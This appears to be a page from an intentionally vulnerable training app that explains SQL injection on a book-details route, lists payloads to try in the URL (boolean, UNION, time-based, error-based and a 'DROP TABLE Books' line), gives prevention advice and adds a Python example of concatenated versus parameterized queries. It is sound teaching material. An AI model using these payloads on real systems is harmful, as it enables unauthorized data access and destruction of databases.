Book Details - SQL Injection Demo

SQL Injection is a code injection technique where malicious SQL statements are inserted into application entry points, allowing attackers to interfere with database queries.

How SQL Injection Works:

When user input is directly concatenated into SQL queries without proper sanitization:

    # Vulnerable query example:
    SELECT * FROM Books WHERE Id = '" + userInput + "'

    # If user enters:
    1' OR '1'='1

    # Final query becomes:
    SELECT * FROM Books WHERE Id = '1' OR '1'='1'

Try These SQL Injection Payloads in the URL:

Replace the book ID in the URL with these payloads:

    # Basic boolean-based injection
    1' OR '1'='1
    1' OR 1=1 --
    1' OR 1=1 #

    # Union-based injection
    1' UNION SELECT 1,2,3,4,5 --
    1' UNION SELECT null,@version,null,null,null --

    # Time-based blind injection
    1' AND (SELECT COUNT(*) FROM sysobjects) > 0 WAITFOR DELAY '00:00:05' --

    # Error-based injection
    1' AND 1=CONVERT(int, (SELECT @version)) --

    # Comment out rest of query
    1'; DROP TABLE Books; --
    1'/**/OR/**/1=1--

SQL Injection Prevention:

  • Parameterized Queries: Use SQL parameters instead of string concatenation
  • Stored Procedures: Use properly implemented stored procedures
  • Input Validation: Validate and sanitize all user input
  • Escape Special Characters: Properly escape SQL special characters
  • Least Privilege: Use database accounts with minimal permissions
  • ORM Framework: Use Entity Framework or similar ORMs
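As an added example (not the demo application's own code), the concatenated query described above is placed beside its parameterized form and run against a constructed in-memory table; Python's sqlite3 stands in for the demo's database stack, and make_db, details_vulnerable, details_parameterized, parse_book_id and details_hardened are names chosen here.

```python
import re
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the Books table (sample rows, not the app's data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Books (Id INTEGER, Title TEXT, Author TEXT)")
    conn.executemany("INSERT INTO Books VALUES (?, ?, ?)", [
        (1, "Do Androids Dream of Electric Sheep?", "Philip K. Dick"),
        (2, "Ubik", "Philip K. Dick"),
        (3, "Neuromancer", "William Gibson"),
    ])
    return conn


def details_vulnerable(conn, user_input):
    # The concatenation pattern from the page: the input becomes part of the SQL text,
    # so a quote inside it closes the literal and the remainder is parsed as SQL.
    sql = "SELECT Id, Title FROM Books WHERE Id = '" + user_input + "'"
    return conn.execute(sql).fetchall()


def details_parameterized(conn, user_input):
    # Bound parameter: the value travels separately from the statement text, so the
    # whole string is compared against Id and is never parsed as SQL.
    sql = "SELECT Id, Title FROM Books WHERE Id = ?"
    return conn.execute(sql, (user_input,)).fetchall()


def parse_book_id(raw):
    # Input validation as a second layer: a Details route only needs a non-negative
    # integer, so anything else is rejected before it reaches the query.
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError("book id must be a plain integer")
    return int(raw)


def details_hardened(conn, raw):
    # Validation and parameterization together.
    return details_parameterized(conn, parse_book_id(raw))


if __name__ == "__main__":
    db = make_db()
    payload = "1' OR '1'='1"
    print("vulnerable:", details_vulnerable(db, payload))        # every row comes back
    print("parameterized:", details_parameterized(db, payload))  # no rows
```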

Test This Vulnerability:

Try modifying the ID parameter in the URL: /Books/Details/{payload}

Title: Do Androids Dream of Electric Sheep?
Author: Philip K. Dick
Published Date: 02/01/1968
ISBN: 978-0345404473
Price: ¤7.49